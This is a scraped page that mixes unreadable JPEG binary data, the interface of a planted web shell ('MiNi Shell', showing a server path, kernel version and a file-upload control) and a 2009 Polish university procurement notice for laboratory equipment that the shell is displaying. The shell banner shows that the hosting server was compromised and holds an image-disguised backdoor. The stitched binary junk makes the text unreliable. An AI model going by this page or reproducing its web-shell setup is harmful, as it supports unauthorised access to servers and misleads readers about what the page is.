JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/174301-N-2009.html

<p class="kh_header"><b>Kielce: Dostawa zródeł i materiałów kalibracyjnych</b><br>
<b>Numer ogłoszenia: 174301 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Humanistyczno-Przyrodniczy Jana Kochanowskiego w Kielcach , ul. Żeromskiego 5, 25-369 Kielce, woj. świętokrzyskie, tel. 041 3497277, faks 041 3497278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ujk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa zródeł i materiałów kalibracyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa źródeł i materiałów kalibracyjnych z podziałem na części:
-Część I - dostawa NI LAB WINDOWS/CVI Full Dev System - wersja dla Uczelni;
-Część II- dostawa zestawu - Standardy kalibracyjne o koncentracji 100mg/l i pojemności opakowania 100 ml; 
-Część III- dostawa tabletkarki ręcznej; 
-Część IV- dostawa młynka do proszkowania materiałów mineralnych do analizy próbek w metodzie XRF, geologii, chemii z pełnym wyposażeniem (elektrycznego); 
-Część V- dostawa wagi analitycznej ze szklaną obudową komory pomiarowej;
-Część VI- dostawa zestawu certyfikowanych kalibracyjnych źródeł promieniotwórczych;
-Część VII- dostawa zestawu pipet laboratoryjnych wysokiej dokładności jednokanałowych elektronicznych z wyrzutnikiem; zestaw pipet laboratoryjnych wysokiej dokładności jednokanałowych autoklaw owalnych z wyrzutnikiem; statyw na 3 zestawy pipet jednokanałowych elektronicznych zgodny z pipetami opisanymi wyżej; statyw karuzelowy dla 6 jednokanałowych pipet zgodny z pipetami opisanymi wyżej; analogowy sensor laserowy do pomiaru odległości z wyjściem napięciowym, prądowymi i quasi analogowym przez RS-232; 
-Część VIII- dostawa mikroskopu optycznego i oprogramowania;
-Część IX- dostawa przenośnego inkubatora z atmosferą CO2;
-Część X- dostawa stolika z elektrycznym przesuwem krokowym X - Y - Z; silniki krokowe do stolika przesuwnego opisanego wyżej; stolik rotacyjny elektryczny; kontroler 8-pozycyjny do silników stolika przesuwnego i stolika rotacyjnego opisanych wyżej;
-Część XI- dostawa automatycznego licznika kolonii; 
-Część XII- dostawa detektora promieniowania CR-39 wraz z zestawem odczynników do wytrawiania;
-Część XIII- dostawa modułu oprogramowania STATISTICS TOOLBOX do MATLAB; 
-Część XIV- dostawa programu do opracowywania danych cytometrycznych FLOWJO. 
Szczegółowy opis przedmiotu zamówienia zawierają załączniki do SIWZ od nr 4.I do 4.XIV..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.19.00.00-6, 33.15.20.00-0, 38.31.11.00-9, 38.43.20.00-2, 38.42.70.00-7, 38.50.00.00-0, 38.51.00.00-3, 38.55.00.00-5, 39.14.33.10-2, 39.30.00.00-5, 42.11.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie przelewem wadium w kwocie:
-dla części I- 70,00 zł (słownie złotych: siedemdziesiąt),
-dla części II- 300,00 zł (słownie złotych: trzysta),
-dla części III- 1 000,00 zł (słownie złotych: jeden tysiąc),
-dla części IV- 1 000,00 zł (słownie złotych: jeden tysiąc),
-dla części V- 600,00 zł (słownie złotych: sześćset),
-dla części VI- 100,00 zł (słownie złotych: sto),
-dla części VII- 290,00 zł (słownie złotych: dwieście dziewięćdziesiąt),
-dla części VIII- 230,00 zł (słownie złotych: dwieście trzydzieści),
-dla części IX- 260,00 zł (słownie złotych: dwieście sześćdziesiąt)
-dla części X- 1 700,00 zł (słownie złotych: jeden tysiąc siedemset).
-dla części XI- 950,00 zł (słownie złotych: dziewięćset pięćdziesiąt).
-dla części XII- 50,00 zł (słownie złotych: pięćdziesiąt).
-dla części XIII- 40,00 zł (słownie złotych: czterdzieści).
-dla części XIV- 50,00 zł (słownie złotych: pięćdziesiąt).
Wykonawca, który zamierza wnieść wadium w pieniądzu powinien wpłacić ww. kwotę: przed upływem terminu składania ofert na konto Zamawiającego:
UNIWERSYTET HUMANISTYCZNO- PRZYRODNICZY Jana Kochanowskiego w Kielcach
Bank Handlowy Warszawie S.A. 
Nr 17 1030 1508 0000 0008 0371 1208.
Na dowodzie przelewu należy wpisać: Wadium- Dostawa ..- część ..
Potwierdzoną za zgodność kopię dowodu wpłaty należy dołączyć do oferty.
W przypadku wniesienia wadium w innych formach, dopuszczonych przepisami ustawy Prawo zamówień publicznych art. 45 ust. 6, należy stosowny dokument dołączyć do oferty<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)Opis warunków udziału w postępowaniu:
Wykonawcy, którzy ubiegają się o udzielenie niniejszego zamówienia zobowiązani są spełnić warunki udziału w postępowaniu, określone w art. 22 ust.1 ustawy, w szczególności:
a)posiadają uprawnienia do wykonywania działalności o charakterze dpowiadającym przedmiotowi zamówienia, 
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tzn. w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują min 2 dostawy o charakterze i wielkości odpowiadającej przedmiotowi zamówienia- w odniesieniu do każdej części zamówienia, o wartości nie mniejszej niż:
-dla części I- 3 000 zł brutto każda;
-dla części II- 12 000 zł brutto każda;
-dla części III- 50 000 zł brutto każda;
-dla części IV- 40 000 zł brutto każda;
-dla części V- 20 000 zł brutto każda;
-dla części VI- 5 500 zł brutto każda;
-dla części VII- 12 000 zł brutto każda;
-dla części VIII- 9 500 zł brutto każda;
-dla części IX- 10 800 zł brutto każda.
-dla części X- 75 500 zł brutto każda.
-dla części XI- 38 000 zł brutto każda.
-dla części XII- 2 300 zł brutto każda.
-dla części XIII- 1 700 zł brutto każda.
-dla części XIV- 2 300 zł brutto każda.
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tzn.:
-nie zalegają z opłacaniem podatków i opłat na ubezpieczenie zdrowotne i społeczne,
-są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 50 000 PLN 
d)spełniają warunki określone w art. 22 ust 1 ustawy,
e)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy,
f)   zaproponują sprzęt o parametrach nie gorszych niż opisane w załącznikach Nr 4 do Specyfikacji Istotnych Warunków Zamówienia,
2)Opis dokonywania oceny spełniania warunków:
Ocena spełnienia ww. warunków dokonana zostanie na załączniku do protokołu postępowania o udzielenie zamówienia (DRUK ZP-17) zgodnie z formułą spełnia lub nie spełnia, na podstawie dokumentów wymienionych poniżej orazi w pkt. VIII Specyfikacji Istotnych Warunków Zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty muszą być dołączone niżej wymienione dokumenty: 
1)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)Umowa Spółki Cywilnej, jeżeli działalność prowadzona jest w takiej formie. 
3)Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4)Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 , wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5)Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat, oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6)Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw (co najmniej dwie dostawy) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż:
-dla części I- 3 000 zł brutto każda;
-dla części II- 12 000 zł brutto każda;
-dla części III- 50 000 zł brutto każda;
-dla części IV- 40 000 zł brutto każda;
-dla części V- 20 000 zł brutto każda;
-dla części VI- 5 500 zł brutto każda;
-dla części VII- 12 000 zł brutto każda;
-dla części VIII- 9 500 zł brutto każda;
-dla części IX- 10 800 zł brutto każda;
-dla części X- 75 500 zł brutto każda;
-dla części XI- 38 000 zł brutto każda;
-dla części XII- 2 300 zł brutto każda;
-dla części XIII- 1 700 zł brutto każda;
-dla części XIV- 2 300 zł brutto każda,
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, sporządzonego wg  załącznika Nr 5 do SIWZ oraz załączenia dokumentów potwierdzających, że te dostawy zostały zrealizowane należycie. Zamawiający nie będzie oceniał zrealizowanych lub realizowanych dostaw o wartości poniżej wymaganej (wartości poszczególnych dostaw nie będą sumowane). 
7)Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50 000 zł.
8)Oświadczenie zgodne z art. 22 ust. 1 ustawy Prawo zamówień publicznych.
9)Wzór karty gwarancyjnej, który w swej treści oprócz terminu gwarancji, zawierał będzie informacje określającą czas przystąpienia do usunięcia wad i usterek.
10)Dowód wpłaty wadium.
11)Wypełnioną i podpisaną specyfikację techniczną, na załączniku Nr 1 do Formularza Ofertowego Wykonawcy. 
12)W celu potwierdzenia, że oferowany sprzęt odpowiada wymaganiom określonym przez Zamawiającego, należy złożyć materiały producenta, potwierdzające parametry techniczne oferowanego sprzętu (wymagane w języku polskim).

Dokumenty muszą być przedstawione w postaci oryginałów lub kserokopii poświadczonych za zgodność przez Wykonawcę (czytelny podpis upoważnionego przedstawiciela lub imienna pieczątka z parafą) tj. przez osoby reprezentujące Wykonawcę lub przez pełnomocnika upoważnionego do złożenia oferty w jego imieniu, w takim przypadku do oferty winno być załączone pełnomocnictwo. Sposób reprezentacji musi być zgodny z właściwym wypisem z rejestru.
Dokumenty winny być ułożone w podanej wyżej kolejności.
UWAGA: 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, składa dokumenty zgodnie z § 2.1 Rozporządze?nia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumen?tów, jakich może żądać Zamawia?jący od Wykonawcy oraz form, w jakich te do?kumenty mogą być składane (tj. Dz.U. z 2006 r. Nr 87 poz. 605- z późniejszymi zmianami).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ujk.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> UNIWERSYTET HUMANISTYCZNO- PRZYRODNICZY Jana Kochanowskiego w Kielcach
ul. Żeromskiego 5, pokój nr 21.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2009 godzina 11:00, miejsce: UNIWERSYTET HUMANISTYCZNO- PRZYRODNICZY Jana Kochanowskiego w Kielcach
ul. Żeromskiego 5, pokój nr 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Rozwój bazy badawczej specjalistycznych laboratoriów uczelni publicznych regionu świętokrzyskiego,  współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka na lata 2007-2013.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa NI LAB WINDOWS/CVI Full Dev System- wersja dla Uczelni.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa NI LAB WINDOWS/CVI Full Dev System- wersja dla Uczelni.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.19.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa zestawu- Standardy kalibracyjne o koncentracji 100mg/l i pojemności opakowania 100 ml.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa zestawu- Standardy kalibracyjne o koncentracji 100mg/l i pojemności opakowania 100 ml.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa tabletkarki ręcznej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa tabletkarki ręcznej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.30.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa młynka do proszkowania materiałów mineralnych do analizy próbek 
w metodzie XRF, geologii, chemii z pełnym wyposażeniem (elektrycznego).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa młynka do proszkowania materiałów mineralnych do analizy próbek 
w metodzie XRF, geologii, chemii z pełnym wyposażeniem (elektrycznego).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.20.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa wagi analitycznej ze szklaną obudową komory pomiarowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wagi analitycznej ze szklaną obudową komory pomiarowej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.31.11.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa zestawu certyfikowanych kalibracyjnych źródeł promieniotwórczych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa zestawu certyfikowanych kalibracyjnych źródeł promieniotwórczych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa zestawu pipet laboratoryjnych wysokiej dokładności jednokanałowych elektronicznych z wyrzutnikiem; zestaw pipet laboratoryjnych wysokiej dokładności jednokanałowych autoklaw owalnych z wyrzutnikiem; statyw na 3 zestawy pipet jednokanałowych elektronicznych zgodny z pipetami opisanymi wyżej; statyw karuzelowy dla 6 jednokanałowych pipet zgodny z pipetami opisanymi wyżej; analogowy sensor laserowy do pomiaru odległości z wyjściem napięciowym, prądowymi i quasi analogowym przez RS-232.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa zestawu pipet laboratoryjnych wysokiej dokładności jednokanałowych elektronicznych z wyrzutnikiem; zestaw pipet laboratoryjnych wysokiej dokładności jednokanałowych autoklaw owalnych z wyrzutnikiem; statyw na 3 zestawy pipet jednokanałowych elektronicznych zgodny z pipetami opisanymi wyżej; statyw karuzelowy dla 6 jednokanałowych pipet zgodny z pipetami opisanymi wyżej; analogowy sensor laserowy do pomiaru odległości z wyjściem napięciowym, prądowymi i quasi analogowym przez RS-232.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa mikroskopu optycznego i oprogramowania.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mikroskopu optycznego i oprogramowania.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.51.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa przenośnego inkubatora z atmosferą CO2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa przenośnego inkubatora z atmosferą CO2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa stolika z elektrycznym przesuwem krokowym X - Y - Z; silniki krokowe do stolika przesuwnego opisanego wyżej; stolik rotacyjny elektryczny; kontroler 8-pozycyjny do silników stolika przesuwnego i stolika rotacyjnego opisanych wyżej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa stolika z elektrycznym przesuwem krokowym X - Y - Z; silniki krokowe do stolika przesuwnego opisanego wyżej; stolik rotacyjny elektryczny; kontroler 8-pozycyjny do silników stolika przesuwnego i stolika rotacyjnego opisanych wyżej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.33.10-2, 42.11.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa automatycznego licznika kolonii.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa automatycznego licznika kolonii.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.55.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dostawa detektora promieniowania CR-39 wraz z zestawem odczynników do wytrawiania.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa detektora promieniowania CR-39 wraz z zestawem odczynników do wytrawiania.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.20.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Dostawa modułu oprogramowania STATISTICS TOOLBOX do MATLAB.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa modułu oprogramowania STATISTICS TOOLBOX do MATLAB.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.19.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Dostawa programu do opracowywania danych cytometrycznych FLOWJO.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa programu do opracowywania danych cytometrycznych FLOWJO.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.19.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com